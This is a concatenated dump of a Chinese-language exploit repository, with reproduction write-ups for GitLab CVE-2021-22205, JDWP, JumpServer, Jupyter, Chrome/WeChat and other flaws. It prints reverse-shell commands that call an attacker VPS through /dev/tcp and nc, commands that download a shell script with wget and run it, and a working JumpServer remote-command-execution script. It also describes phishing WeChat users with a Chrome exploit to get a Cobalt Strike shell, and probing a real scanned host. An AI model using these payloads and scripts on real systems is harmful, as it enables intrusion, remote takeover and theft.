使用环境:攻防世界中的环境 6 | 复现版本:无 7 | 8 | # 0x02 环境搭建 9 | 无 10 | 11 | # 0x03 利用条件 12 | 无 13 | 14 | # 0x04 影响版本 15 | 无 16 | 17 | # 0x05 漏洞复现 18 | 攻击环境:kali_x64_en-us 19 | 20 | git clone https://github.com/lijiejie/GitHack 21 | cd ./GitHack-master 22 | python ./GitHack.py http://124.126.19.106:31232/.git/ 23 | 如下图 24 | ![image](./0.png) 25 | ![image](./1.png) 26 | 27 | # 0x06 踩坑记录 28 | 无 29 | 30 | # 0x07 参考链接 31 | 无 32 | -------------------------------------------------------------------------------- /GitLab/GitLab exiftool未授权远程命令执行漏洞(CVE-2021-22205)/pic/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/GitLab/GitLab exiftool未授权远程命令执行漏洞(CVE-2021-22205)/pic/1.png -------------------------------------------------------------------------------- /GitLab/GitLab exiftool未授权远程命令执行漏洞(CVE-2021-22205)/pic/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/GitLab/GitLab exiftool未授权远程命令执行漏洞(CVE-2021-22205)/pic/2.png -------------------------------------------------------------------------------- /GitLab/GitLab exiftool未授权远程命令执行漏洞(CVE-2021-22205)/pic/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/GitLab/GitLab exiftool未授权远程命令执行漏洞(CVE-2021-22205)/pic/3.png -------------------------------------------------------------------------------- /GitLab/GitLab exiftool未授权远程命令执行漏洞(CVE-2021-22205)/pic/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/GitLab/GitLab exiftool未授权远程命令执行漏洞(CVE-2021-22205)/pic/4.png -------------------------------------------------------------------------------- /GitLab/GitLab exiftool未授权远程命令执行漏洞(CVE-2021-22205)/pic/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/GitLab/GitLab exiftool未授权远程命令执行漏洞(CVE-2021-22205)/pic/5.png -------------------------------------------------------------------------------- /GitLab/GitLab exiftool未授权远程命令执行漏洞(CVE-2021-22205)/pic/a.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/GitLab/GitLab exiftool未授权远程命令执行漏洞(CVE-2021-22205)/pic/a.png -------------------------------------------------------------------------------- /GitLab/GitLab exiftool未授权远程命令执行漏洞(CVE-2021-22205)/pic/readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /GitLab/GitLab exiftool未授权远程命令执行漏洞(CVE-2021-22205)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x01 影响版本 2 | Gitlab CE/EE < 13.10.3 3 | Gitlab CE/EE < 13.9.6 4 | Gitlab CE/EE < 13.8.8 5 | # 0x02 环境搭建 6 | 使用环境:CentOS7.6.1810_x64_en-us 7 | 下载rpm安装包:https://packages.gitlab.com/gitlab/gitlab-ce/packages/ol/7/gitlab-ce-13.10.1-ce.0.el7.x86_64.rpm 8 | 安装:sudo rpm -i ./gitlab-ce-13.10.1-ce.0.el7.x86_64.rpm 9 | 修改第1处配置:sudo vim /etc/gitlab/gitlab.rb 10 | ``` 11 | external_url 'http://192.168.202.133:1028' 12 | nginx['listen_addresses'] = ['*', '[::]'] 13 | nginx['listen_port'] = 1028 14 | nginx['listen_https'] = false 15 | ``` 16 | 修改第2处配置:sudo vim /opt/gitlab/embedded/conf/nginx.conf 17 | ``` 18 | server { 19 | listen *:1028; 20 | server_name 192.168.202.133; 21 | if ($http_host = "") { 22 | set $http_host_with_default "ip:1028"; 23 | } 24 | ``` 25 | 临时关闭防火墙 26 | ``` 27 | sudo systemctl stop firewalld 28 | systemctl status firewalld 29 | ``` 30 | 重新加载配置文件 31 | ``` 32 | gitlab-ctl reconfigure 33 | ``` 34 | 重启gitlab 35 | ``` 36 | gitlab-ctl restart 37 | ``` 38 | 成功配置后,访问目标地址如下图 39 | ![image](./pic/1.png) 40 | 首次访问需要更改密码,此处更改密码对应的是管理员用户:admin@example.com 41 | 通过登录界面的注册功能,注册一个新用户,并登录管理员用户通过注册申请,最终登录普通用户如下图 42 | ![image](./pic/2.png) 43 | # 0x03 漏洞复现1(需要验证) 44 | 直接使用工具[https://github.com/mr-r3bot/Gitlab-CVE-2021-22205](https://github.com/mr-r3bot/Gitlab-CVE-2021-22205)复现漏洞会有2个小问题 45 | 1、当验证用户使用管理员时,程序会报错,如下图 46 | ![image](./pic/a.png) 47 | 根据漏洞的基本原理及报错提示,大概猜测报错原因是管理员页面的html内容和普通用户页面的html内容不一致 48 | 2、当验证用户使用普通用户时,提示RCE成功触发,但是没有回显,如下图 49 | ![image](./pic/3.png) 50 | 将漏洞利用的方式改为创建文件,命令如下 51 | ``` 52 | python3 ./exploit.py -u ybdtd -p nihaomadadada -t http://192.168.202.133:1028 -c "touch ybdtybdt.txt" 53 | ``` 54 | 提示RCE成功触发,到服务器端查看,发现成功创建此文件,用户权限是git,如下图 55 | ![image](./pic/4.png) 56 | # 0x04 漏洞复现2(不需要验证) 57 | 无需验证的原理是,可先向[http://192.168.202.133:1028/users/sign_in](http://192.168.202.133:1028/users/sign_in)发起请求获取到如下token 58 | ``` 59 | 60 | 61 | ``` 62 | 然后带着token无需登录即可访问上传接口 63 | 64 | 借助工具:https://github.com/Al1ex/CVE-2021-22205 65 | vps上开启监听 66 | ``` 67 | nc -lnvvvp 1024 68 | ``` 69 | 执行如下命令反弹shell 70 | ``` 71 | python3 ./CVE-2021-22205.py -a true -t http://192.168.202.133:1028 -c "bash -i >& /dev/tcp/xx.xx.xx.xx/1024 0>&1" 72 | ``` 73 | 成功接收到反弹shell,如下图 74 | ![image](./pic/5.png) 75 | # 0x05 参考链接 76 | https://mp.weixin.qq.com/s/cy8OOzHD28Of3zC32S_4ow 77 | https://blog.csdn.net/yzd524850313/article/details/113118193 78 | https://www.jianshu.com/p/56541f6c01a5 79 | https://www.cnblogs.com/ybit/p/14918949.html 80 | https://blog.csdn.net/smellycat000/article/details/121005824 81 | -------------------------------------------------------------------------------- /Google/Google Chrome 0day漏洞(暂无编号)/pic/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Google/Google Chrome 0day漏洞(暂无编号)/pic/0.png -------------------------------------------------------------------------------- /Google/Google Chrome 0day漏洞(暂无编号)/pic/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Google/Google Chrome 0day漏洞(暂无编号)/pic/1.png -------------------------------------------------------------------------------- /Google/Google Chrome 0day漏洞(暂无编号)/pic/readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Google/Google Chrome 0day漏洞(暂无编号)/readme.md: -------------------------------------------------------------------------------- 1 | 1、查看当前chrome版本为最新的89.0.4389.114(64位),如下图 2 | ![image](./pic/0.png) 3 | 4 | 2、以非沙盒模式下运行chrome,powershell中切换到chrome安装目录下,执行 5 | ``` 6 | .\chrome.exe --no-sandbox 7 | ``` 8 | 9 | 3、启动后在浏览器中访问exploit.html,如下图 10 | ![image](./pic/1.png) 11 | -------------------------------------------------------------------------------- /Google/Google Chrome 0day配合微信钓鱼实现CS上线漏洞(暂无编号)/pic/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Google/Google Chrome 0day配合微信钓鱼实现CS上线漏洞(暂无编号)/pic/0.png -------------------------------------------------------------------------------- /Google/Google Chrome 0day配合微信钓鱼实现CS上线漏洞(暂无编号)/pic/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Google/Google Chrome 0day配合微信钓鱼实现CS上线漏洞(暂无编号)/pic/1.png -------------------------------------------------------------------------------- /Google/Google Chrome 0day配合微信钓鱼实现CS上线漏洞(暂无编号)/pic/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Google/Google Chrome 0day配合微信钓鱼实现CS上线漏洞(暂无编号)/pic/2.png -------------------------------------------------------------------------------- /Google/Google Chrome 0day配合微信钓鱼实现CS上线漏洞(暂无编号)/pic/readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Google/Google Chrome 0day配合微信钓鱼实现CS上线漏洞(暂无编号)/readme.md: -------------------------------------------------------------------------------- 1 | 原理:微信内置浏览器使用Chromium内核,且打开网页默认不启用沙箱 2 | 微信版本3.2.1.132,如下图: 3 | ![image](./pic/2.png) 4 | 5 | 本地起一个HTTP服务,我用的phpstudy,将wechat-exploit.html放入web目录下,微信中访问链接,CS收到反连Shell,如下图 6 | ![image](./pic/0.png) 7 | ![image](./pic/1.png) 8 | 9 | 参考链接: 10 | https://mp.weixin.qq.com/s/LOpAu8vs8ob85W3sCmXMew 11 | https://mp.weixin.qq.com/s/TC9EDiiZnxGeyM7BP9wZYQ 12 | -------------------------------------------------------------------------------- /JBOSS/JBoss漏洞集合.md: -------------------------------------------------------------------------------- 1 | 可通过Wappalyzer识别jboss版本 2 | ![image](./pic/01.png) 3 | 4 | ``` 5 | /jmx-console/HtmlAdaptor 6 | /invoker/EJBInvokerServlet 7 | /jmx-console/ 8 | ``` 9 | 10 | JBoss 4.x(4.0.5)接口特征 11 | ``` 12 | /jbossmq-httpil/HTTPServerILServlet 13 | ``` 14 | 15 | JBoss 5.x / 6.x 16 | ``` 17 | /invoker/readonly 18 | ``` 19 | 20 | JBoss JMXInvokerServlet 21 | ``` 22 | /invoker/JMXInvokerServlet 23 | ``` 24 | 25 | # 参考链接 26 | https://blog.csdn.net/Aaron_Miller/article/details/106624809 27 | https://si1ent.xyz/2020/07/05/Jboss漏洞汇总/ -------------------------------------------------------------------------------- /JBOSS/pic/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/JBOSS/pic/01.png -------------------------------------------------------------------------------- /JDWP/JDWP远程代码执行漏洞(暂无编号)/pic/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/JDWP/JDWP远程代码执行漏洞(暂无编号)/pic/1.png -------------------------------------------------------------------------------- /JDWP/JDWP远程代码执行漏洞(暂无编号)/pic/readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /JDWP/JDWP远程代码执行漏洞(暂无编号)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x01 打点发现 2 | nmap扫描某ip的C段,用时大概19h,对识别到的指纹信息依次查看,查看到如下信息 3 | ``` 4 | 5005/tcp open jdwp Java Debug Wire Protocol (Reference Implementation) version 1.8 1.8.0_191 5 | |_jdwp-info: ERROR: Script execution failed (use -d to debug) 6 | ``` 7 | 之前复现过JDWP的漏洞,故有此文 8 | 9 | # 0x02 简单验证 10 | telnet 106.53.xx.xx 5005 11 | 返回JDWP-Handshake,即表示存在漏洞 12 | 我这边没有返回JDWP-Handshake,不管它,继续尝试利用 13 | # 0x03 dnslog测试 14 | 1、先打个dnslog试试水 15 | POC下载地址:https://github.com/IOActive/jdwp-shellifier 16 | 执行如下命令 17 | ``` 18 | python2 jdwp-shellifier.py -t 192.168.3.118 -p 8787 --break-on "java.lang.String.indexof" --cmd "ping xx.dnslog.cn" 19 | ``` 20 | dnslog平台成功收到回显,感觉有戏 21 | # 0x04 尝试反弹shell 22 | 将如下内容保存为shell.txt,放置到vps下,并通过python3开启一个临时的http服务器 23 | ``` 24 | nc 192.168.178.129 3333 | /bin/bash | nc 192.168.178.129 4444% 25 | ``` 26 | 开启监听,需要开启2个监听,前面一个输入执行命令,后面一个输出命令执行结果 27 | ``` 28 | 这里要注意,阿里云的vps开启nc监听,需要加个选项n,否则会报错 29 | 30 | nc -lnvvp 3333 31 | nc -lnvvp 4444 32 | ``` 33 | 利用POC执行下载shell、对文件赋予可执行权限、执行shell 34 | ``` 35 | python2 jdwp-shellifier.py -t 192.168.178.128 -p 8000 --break-on "java.lang.String.indexof" --cmd "wget http://192.168.178.129:8000/shell.txt -O /tmp/shell.sh" 36 | python2 jdwp-shellifier.py -t 192.168.178.128 -p 8000 --break-on "java.lang.String.indexof" --cmd "chmod a+x /tmp/shell.sh" 37 | python2 jdwp-shellifier.py -t 192.168.178.128 -p 8000 --break-on "java.lang.String.indexof" --cmd "/tmp/shell.sh" 38 | ``` 39 | 成功执行完,vps上并没有收到反弹回来的shell 40 | 思考了一下,payload中使用nc连接vps,目标可能不存在nc,改用sh,修改shell.txt为如下 41 | ``` 42 | sh -i >& /dev/tcp/101.200.xx.xx/3333 0>&1 | /bin/sh | sh -i >& /dev/tcp/101.200.xx.xx/4444 0>&1% 43 | ``` 44 | 成功接收到反弹shell,如下图 45 | ![image](./pic/1.png) 46 | 47 | # 0x05 参考链接: 48 | https://blog.csdn.net/weixin_43486390/article/details/114259762 49 | -------------------------------------------------------------------------------- /JumpServer/JumpServer任意用户密码重置(CVE-2023-42820)/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/JumpServer/JumpServer任意用户密码重置(CVE-2023-42820)/01.png -------------------------------------------------------------------------------- /JumpServer/JumpServer任意用户密码重置(CVE-2023-42820)/JumpServer任意用户密码重置(CVE-2023-42820).md: -------------------------------------------------------------------------------- 1 | # 漏洞成因 2 | ``` 3 | 由于第三方库django-simple-captcha暴露了随机数种子,可通过api查看,导致了重置密码时的验证码可被猜解,进而可以重置密码 4 | ``` 5 | 6 | # 影响版本 7 | ``` 8 | v2.24 <= version <= v3.6.4 9 | 10 | Patched Version 11 | >= v2.28.19, >= v3.6.5 12 | ``` 13 | 14 | # 漏洞复现 15 | 复现过程参见P牛的复现过程就可以,出于绿色环保,我就不再赘述一遍了,只说一下复现后的几点经验 16 | ``` 17 | 我第一遍没打成,第二遍才打成的 18 | 19 | 当前的jumpserver环境由于管理的资产少,所以发送10次请求就可以猜到重置密码的验证码,实际攻击中,可能需要发送大量请求 20 | 21 | 漏洞的利用需要知道用户名和邮箱,这个先决条件导致这个漏洞有点鸡肋 22 | ``` 23 | 最后附上一张漏洞利用成功的截图 24 | ![image](./01.png) 25 | 26 | 27 | # Reference 28 | ``` 29 | https://github.com/vulhub/vulhub/tree/master/jumpserver/CVE-2023-42820 30 | https://github.com/jumpserver/jumpserver/security/advisories/GHSA-7prv-g565-82qp 31 | ``` -------------------------------------------------------------------------------- /JumpServer/JumpServer远程代码执行漏洞(暂无编号)/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/JumpServer/JumpServer远程代码执行漏洞(暂无编号)/0.png -------------------------------------------------------------------------------- /JumpServer/JumpServer远程代码执行漏洞(暂无编号)/a0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/JumpServer/JumpServer远程代码执行漏洞(暂无编号)/a0.png -------------------------------------------------------------------------------- /JumpServer/JumpServer远程代码执行漏洞(暂无编号)/a1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/JumpServer/JumpServer远程代码执行漏洞(暂无编号)/a1.png -------------------------------------------------------------------------------- /JumpServer/JumpServer远程代码执行漏洞(暂无编号)/jumpserver-rce.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # import requests 3 | # import json 4 | # data={"user":"4320ce47-e0e0-4b86-adb1-675ca611ea0c","asset":"ccb9c6d7-6221-445e-9fcc-b30c95162825","system_user":"79655e4e-1741-46af-a793-fff394540a52"} 5 | # 6 | # url_host='http://192.168.1.73:8080' 7 | # 8 | # def get_token(): 9 | # url = url_host+'/api/v1/users/connection-token/?user-only=1' 10 | # url =url_host+'/api/v1/authentication/connection-token/?user-only=1' 11 | # response = requests.post(url, json=data).json() 12 | # print(response) 13 | # ret=requests.get(url_host+'/api/v1/authentication/connection-token/?token=%s'%response['token']) 14 | # print(ret.text) 15 | # get_token() 16 | import asyncio 17 | import websockets 18 | import requests 19 | import json 20 | url = "/api/v1/authentication/connection-token/?user-only=None" 21 | 22 | # 向服务器端发送认证后的消息 23 | async def send_msg(websocket,_text): 24 | if _text == "exit": 25 | print(f'you have enter "exit", goodbye') 26 | await websocket.close(reason="user exit") 27 | return False 28 | await websocket.send(_text) 29 | recv_text = await websocket.recv() 30 | print(f"{recv_text}") 31 | 32 | # 客户端主逻辑 33 | async def main_logic(cmd): 34 | print("#######start ws") 35 | async with websockets.connect(target) as websocket: 36 | recv_text = await websocket.recv() 37 | print(f"{recv_text}") 38 | resws=json.loads(recv_text) 39 | id = resws['id'] 40 | print("get ws id:"+id) 41 | print("###############") 42 | print("init ws") 43 | print("###############") 44 | inittext = json.dumps({"id": id, "type": "TERMINAL_INIT", "data": "{\"cols\":164,\"rows\":17}"}) 45 | await send_msg(websocket,inittext) 46 | for i in range(20): 47 | recv_text = await websocket.recv() 48 | print(f"{recv_text}") 49 | print("###############") 50 | print("exec cmd: ls") 51 | cmdtext = json.dumps({"id": id, "type": "TERMINAL_DATA", "data": cmd+"\r\n"}) 52 | print(cmdtext) 53 | await send_msg(websocket, cmdtext) 54 | for i in range(20): 55 | recv_text = await websocket.recv() 56 | print(f"{recv_text}") 57 | print('#######finish') 58 | 59 | 60 | if __name__ == '__main__': 61 | try: 62 | import sys 63 | host=sys.argv[1] 64 | cmd=sys.argv[2] 65 | if host[-1]=='/': 66 | host=host[:-1] 67 | print(host) 68 | data = {"user": "4320ce47-e0e0-4b86-adb1-675ca611ea0c", "asset": "ccb9c6d7-6221-445e-9fcc-b30c95162825", 69 | "system_user": "79655e4e-1741-46af-a793-fff394540a52"} 70 | print("##################") 71 | print("get token url:%s" % (host + url,)) 72 | print("##################") 73 | res = requests.post(host + url, json=data) 74 | token = res.json()["token"] 75 | print("token:%s", (token,)) 76 | print("##################") 77 | target = "ws://" + host.replace("http://", '') + "/koko/ws/token/?target_id=" + token 78 | print("target ws:%s" % (target,)) 79 | asyncio.get_event_loop().run_until_complete(main_logic(cmd)) 80 | except: 81 | print("python jumpserver.py http://192.168.1.73 whoami") -------------------------------------------------------------------------------- /JumpServer/JumpServer远程代码执行漏洞(暂无编号)/quick_start.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | 4 | flag=0 5 | 6 | echo -ne "User Check \t........................ " 7 | isRoot=`id -u -n | grep root | wc -l` 8 | if [ "x$isRoot" == "x1" ]; then 9 | echo -e "[\033[32m OK \033[0m]" 10 | else 11 | echo -e "[\033[31m ERROR \033[0m] 请用 root 用户执行安装脚本" 12 | flag=1 13 | fi 14 | 15 | echo -ne "OS Check \t........................ " 16 | if [ -f /etc/redhat-release ]; then 17 | osVersion=`cat /etc/redhat-release | grep -oE '[0-9]+\.[0-9]+'` 18 | majorVersion=`echo $osVersion | awk -F. '{print $1}'` 19 | if [ "x$majorVersion" == "x" ]; then 20 | echo -e "[\033[31m ERROR \033[0m] 操作系统类型版本不符合要求,请使用 CentOS 7 64 位版本" 21 | flag=1 22 | else 23 | if [[ $majorVersion == 7 ]]; then 24 | is64bitArch=`uname -m` 25 | if [ "x$is64bitArch" == "xx86_64" ]; then 26 | echo -e "[\033[32m OK \033[0m]" 27 | else 28 | echo -e "[\033[31m ERROR \033[0m] 操作系统必须是 64 位的,32 位的不支持" 29 | flag=1 30 | fi 31 | else 32 | echo -e "[\033[31m ERROR \033[0m] 操作系统类型版本不符合要求,请使用 CentOS 7" 33 | flag=1 34 | fi 35 | fi 36 | else 37 | echo -e "[\033[31m ERROR \033[0m] 操作系统类型版本不符合要求,请使用 CentOS 7" 38 | flag=1 39 | fi 40 | echo -ne "CPU Check \t........................ " 41 | processor=`cat /proc/cpuinfo| grep "processor"| wc -l` 42 | if [ $processor -lt 2 ]; then 43 | echo -e "[\033[31m ERROR \033[0m] CPU 小于 2核,JumpServer 所在机器的 CPU 需要至少 2核" 44 | flag=1 45 | else 46 | echo -e "[\033[32m OK \033[0m]" 47 | fi 48 | 49 | echo -ne "Memory Check \t........................ " 50 | memTotal=`cat /proc/meminfo | grep MemTotal | awk '{print $2}'` 51 | if [ $memTotal -lt 7500000 ]; then 52 | echo -e "[\033[31m ERROR \033[0m] 内存小于 8G,JumpServer 所在机器的内存需要至少 8G" 53 | flag=1 54 | else 55 | echo -e "[\033[32m OK \033[0m]" 56 | fi 57 | if [ $flag -eq 1 ]; then 58 | echo "安装环境检测未通过,请查阅上述环境检测结果" 59 | exit 1 60 | fi 61 | which wget >/dev/null 2>&1 62 | if [ $? -ne 0 ];then 63 | yum install -y wget 64 | fi 65 | 66 | Version=$(curl -s 'https://api.github.com/repos/jumpserver/installer/releases/latest' | grep "tag_name" | head -n 1 | awk -F ":" '{print $2}' | sed 's/\"//g;s/,//g;s/ //g') 67 | 68 | cd /opt 69 | if [ ! -d "/opt/jumpserver-installer-$Version" ]; then 70 | wget https://github.com/jumpserver/installer/releases/download/$Version/jumpserver-installer-$Version.tar.gz || { 71 | rm -rf /opt/jumpserver-installer-$Version.tar.gz 72 | echo -e "\033[31m [ERROR] 下载 jumpserver-installer 失败, 请检查网络是否正常或尝试重新执行脚本 \033[0m" 73 | exit 1 74 | } 75 | tar -xf /opt/jumpserver-installer-$Version.tar.gz -C /opt || { 76 | rm -rf /opt/jumpserver-installer-$Version 77 | echo -e "\033[31m [ERROR] 解压 jumpserver-installer 失败, 请检查网络是否正常或尝试重新执行脚本 \033[0m" 78 | exit 1 79 | } 80 | rm -rf /opt/jumpserver-installer-$Version.tar.gz 81 | fi 82 | 83 | cd /opt/jumpserver-installer-$Version 84 | 85 | JMS_Version="v2.6.1" 86 | 87 | sed -i "s/VERSION=.*/VERSION=$JMS_Version/g" /opt/jumpserver-installer-$Version/static.env 88 | 89 | echo "" 90 | echo -e "\033[33m JumpServer 部署脚本已经下载至 /opt/jumpserver-installer-$Version 目录 \n \033[0m" 91 | sleep 5s 92 | 93 | export DOCKER_IMAGE_PREFIX=docker.mirrors.ustc.edu.cn 94 | ./jmsctl.sh install 95 | -------------------------------------------------------------------------------- /JumpServer/JumpServer远程代码执行漏洞(暂无编号)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 软件介绍 2 | JumpServer:一款在中国流行的开源堡垒机 3 | 4 | # 0x01 复现环境 5 | 复现环境:本地环境 centos7 x64 6 | 复现版本:JumpServer v2.6.1 7 | 环境搭建: 8 | 1、使用官方提供的v2.6.1的quick_start.sh安装后,竟然后v2.6.2,这个坑真是无语了,使用知识星球师傅提供的安装脚本,安装后是v2.6.1(这个安装脚本执行后可能会报错,多试几次),安装脚本被上载到当前目录下 9 | 2、执行quick_start.sh后,一路默认即可 10 | 3、安装完成后需要切换到/opt/jumpserver-installer-v2.6.1/下执行jmsctl.sh,直接使用绝对路径会报错 11 | 4、需要开启iptables,否则报错 12 | 5、重新安装2.6.1后,本地能访问,远程不能访问,无奈再次重新安装centos7以及JumpServer v2.6.1 13 | 14 | # 0x02 利用条件 15 | 无 16 | 17 | # 0x03 影响版本 18 | JumpServer < v2.6.2 19 | JumpServer < v2.5.4 20 | JumpServer < v2.4.5 21 | 22 | # 0x04 漏洞复现 23 | 攻击环境:kali x64 24 | chrome下安装扩展:https://chrome.google.com/webstore/detail/websocket-test-client/fgponpodhbmadfljofbimhhlengambbn/related 25 | 远程日志读取payload: 26 | ``` 27 | ws://192.168.1.73:8080/ws/ops/tasks/log/ 28 | {"task":"/opt/jumpserver/logs/jumpserver"} 29 | ``` 30 | 如下图,红色圈出的部分即为读取到的远程服务器上的日志内容 31 | ![image](./a1.png) 32 | 33 | 如下图,红色圈出的部分即为服务器上的日志内容 34 | ![image](./a0.png) 35 | 36 | 至于远程命令执行,首先需要在返回的信息中获取Taskid 37 | ``` 38 | ws://xx.xx.xx.xx:8080/ws/ops/tasks/log/ 39 | {"task":"/opt/jumpserver/logs/jumpserver"} 40 | ``` 41 | 如下图(下图摘自别人的文章) 42 | ![image](./0.png) 43 | 利用上一步得到的Taskid,可进行进一步的信息获取,将Taskid值send给接口,即可查看到当前任务的详细信息。 44 | ``` 45 | {"task":"dc0533d8-078a-47c0-b554-01f368a89a19"} 46 | ``` 47 | 可能有些小伙伴在复现读取Taskid信息时没有成功,我也一样,我们获取到的内容取决于日志记录的内容,一些Taskid可能已经失效了,在进行测试的时候可以看一下当前Taskid对应的时间,过于久远的id肯定是无法获取详情的。同理也能解释为什么在很多次测试中没有搜索到system_user这个字段,如果在实战中运气足够好,正好赶上管理员登陆了系统未退出,在日志中获取到system_user、user、asset这三个字段,则可以RCE,脚本参考jumpserver-rce.py 48 | 49 | 原理是模拟web terminal,前提需要user、system_user、assert这三个字段的值,这3个一般读取不到,利用难度较大 50 | 51 | # 0x05 批量脚本 52 | 无 53 | 54 | # 0x06 参考链接 55 | https://articles.zsxq.com/id_5raonmuwqrru.html 56 | https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&mid=2247497420&idx=1&sn=49b6179b24a4275f016a80b16ba401aa&chksm=ec9f2fbfdbe8a6a9318f7ba90eaca911692ae24f72591225efb19eab4852cf8e893936ee2a06&mpshare=1&scene=1&srcid=01183gic1iE9CgPOeU1ZKNoQ&sharer_sharetime=1610978241607&sharer_shareid=39e4b7efe0bb5b2e5770f3a926f3062d&exportkey=AUvxarwZSXcAl0lXgRSI%2F2o%3D&pass_ticket=rI5WvWxPWj9wFDSMj42xLhizShWaMpx4MwP7SFhDHLUZpJ0zrnUrOlEEfOlgFO8t&wx_header=0#rd 57 | -------------------------------------------------------------------------------- /Jupyter Notebook/Jupyter Notebook未授权访问导致RCE漏洞(暂无编号)/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Jupyter Notebook/Jupyter Notebook未授权访问导致RCE漏洞(暂无编号)/0.png -------------------------------------------------------------------------------- /Jupyter Notebook/Jupyter Notebook未授权访问导致RCE漏洞(暂无编号)/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Jupyter Notebook/Jupyter Notebook未授权访问导致RCE漏洞(暂无编号)/1.png -------------------------------------------------------------------------------- /Jupyter Notebook/Jupyter Notebook未授权访问导致RCE漏洞(暂无编号)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 复现环境 2 | 使用复现环境:360众测仿真实战靶场考试 3 | 其他复现环境:https://github.com/vulhub/vulhub/tree/master/jupyter/notebook-rce 4 | 5 | # 0x01 利用条件 6 | 无 7 | 8 | # 0x02 影响版本 9 | 全版本(只要管理员没有为web界面访问配置密码、ip限制等策略,都受影响) 10 | 11 | # 0x03 漏洞复现 12 | 由于考试时没有截图,故下图借用别人的图 13 | 14 | 新建一个terminal窗口,如图 15 | ![image](./0.png) 16 | 直接就RCE了,如图 17 | ![image](./1.png) 18 | 19 | # 0x04 踩坑记录 20 | 无 21 | 22 | # 参考链接 23 | https://www.cnblogs.com/mke2fs/p/12718499.html 24 | -------------------------------------------------------------------------------- /Kubernetes/Kubernetes容器逃逸漏洞(CVE-2022-0185)【记录】/readme.md: -------------------------------------------------------------------------------- 1 | 执行命令unshare,获知docker容器中是否有这个命令,有的话才可能有戏,利用漏洞CVE-2022-0185 2 | 3 | ``` 4 | docker run -it ubuntu:20.04 /bin/bash 5 | root@4e22094edd46:/# unshare 6 | unshare: unshare failed: Operation not permitted 7 | 8 | kubectl run -it ubutest2 --image=ubuntu:20.04 /bin/bash 9 | 10 | root@ubutest2:/# pscap -a 11 | ppid pid name command capabilities 12 | 0 1 root bash chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, net_raw, sys_chroot, mknod, audit_write, setfcap 13 | 14 | root@ubutest2:/# unshare -r 15 | # pscap -a 16 | ppid pid name command capabilities 17 | 0 1 root bash chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, net_raw, sys_chroot, mknod, audit_write, setfcap 18 | 1 270 root sh full 19 | ``` 20 | 21 | 参考连接: 22 | [https://www.4hou.com/posts/GWkK](https://www.4hou.com/posts/GWkK) 23 | 24 | PoC参见: 25 | [https://twitter.com/clubby789/status/1484482788313255939?s=20](https://twitter.com/clubby789/status/1484482788313255939?s=20) -------------------------------------------------------------------------------- /Microsoft/Microsoft IIS6.0远程代码执行漏洞(CVE-2017-7269)/readme.md: -------------------------------------------------------------------------------- 1 | 此篇文章之前已投稿到先知社区,此处不再赘述,地址:https://xz.aliyun.com/t/6485 2 | -------------------------------------------------------------------------------- /Microsoft/Microsoft RDP远程代码执行漏洞(CVE-2019-0708)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 软件介绍 2 | Windows RDP:Windows下自带的一款远程桌面服务 3 | 4 | # 0x01 复现环境 5 | 使用环境:本地搭建的环境 6 | 复现版本:2008_r2_standard_zh-chs 7 | 8 